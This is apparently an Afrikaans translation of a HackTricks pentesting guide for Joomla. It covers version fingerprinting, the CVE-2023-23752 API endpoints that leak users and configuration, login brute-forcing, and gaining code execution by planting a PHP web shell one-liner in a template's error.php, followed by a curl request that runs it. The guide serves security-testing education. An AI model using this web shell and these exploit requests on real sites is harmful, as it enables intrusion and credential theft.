Joomla
Last updated
Last updated
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Verdiep jou kundigheid in Mobiele Sekuriteit met 8kSec Akademie. Beheers iOS en Android sekuriteit deur ons self-gebaseerde kursusse en kry gesertifiseer:
Joomla verskaf 'n paar anonieme gebruik statistieke soos die verdeling van Joomla, PHP en databasis weergawes en bediener bedryfstelsels wat in gebruik is op Joomla installasies. Hierdie data kan deur hul openbare API opgevraag word.
Kontroleer die meta
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml kan jy die weergawe sien.
In /language/en-GB/en-GB.xml kan jy die weergawe van Joomla kry.
In plugins/system/cache/cache.xml kan jy 'n benaderde weergawe sien.
In 80,443 - Pentesting Web Metodologie is 'n afdeling oor CMS skanners wat Joomla kan skandeer.
Weergawes Van 4.0.0 tot 4.2.7 is kwesbaar vir ongeauthentiseerde inligtingsontsluiting (CVE-2023-23752) wat kredensiale en ander inligting sal dump.
Gebruikers: http://<host>/api/v1/users?public=true
Konfigurasie Lêer: http://<host>/api/index.php/v1/config/application?public=true
MSF Module: scanner/http/joomla_api_improper_access_checks
of ruby skrip: 51334
Jy kan hierdie skrip gebruik om te probeer om die aanmelding te brute force.
As jy daarin slaag om admin akrediteer te verkry, kan jy RCE binne dit verkry deur 'n snit van PHP kode by te voeg om RCE te verkry. Ons kan dit doen deur 'n sjabloon te pas.
Klik op Templates
onderaan links onder Configuration
om die sjabloonmenu op te roep.
Klik op 'n sjabloon naam. Kom ons kies protostar
onder die Template
kolomkop. Dit sal ons na die Templates: Customise
bladsy bring.
Laastens kan jy op 'n bladsy klik om die bladsybron op te roep. Kom ons kies die error.php
bladsy. Ons sal 'n PHP een-liner byvoeg om kode-uitvoering te verkry soos volg:
system($_GET['cmd']);
Stoor & Sluit
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Joomla Exploit Script wat XSS na RCE of ander kritieke kwesbaarhede verhoog. Vir meer inligting, kyk na hierdie pos. Dit bied ondersteuning vir Joomla weergawes 5.X.X, 4.X.X, en 3.X.X, en laat toe om:
Privilegie Escalatie: Skep 'n gebruiker in Joomla.
(RCE) Ingeboude Sjablone Wysig: Wysig 'n Ingeboude Sjabloon in Joomla.
(Aangepas) Aangepaste Exploits: Aangepaste Exploits vir Derdeparty Joomla Plugins.
Verdiep jou kundigheid in Mobiele Sekuriteit met 8kSec Akademie. Meester iOS en Android sekuriteit deur ons self-gebaseerde kursusse en kry sertifisering:
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)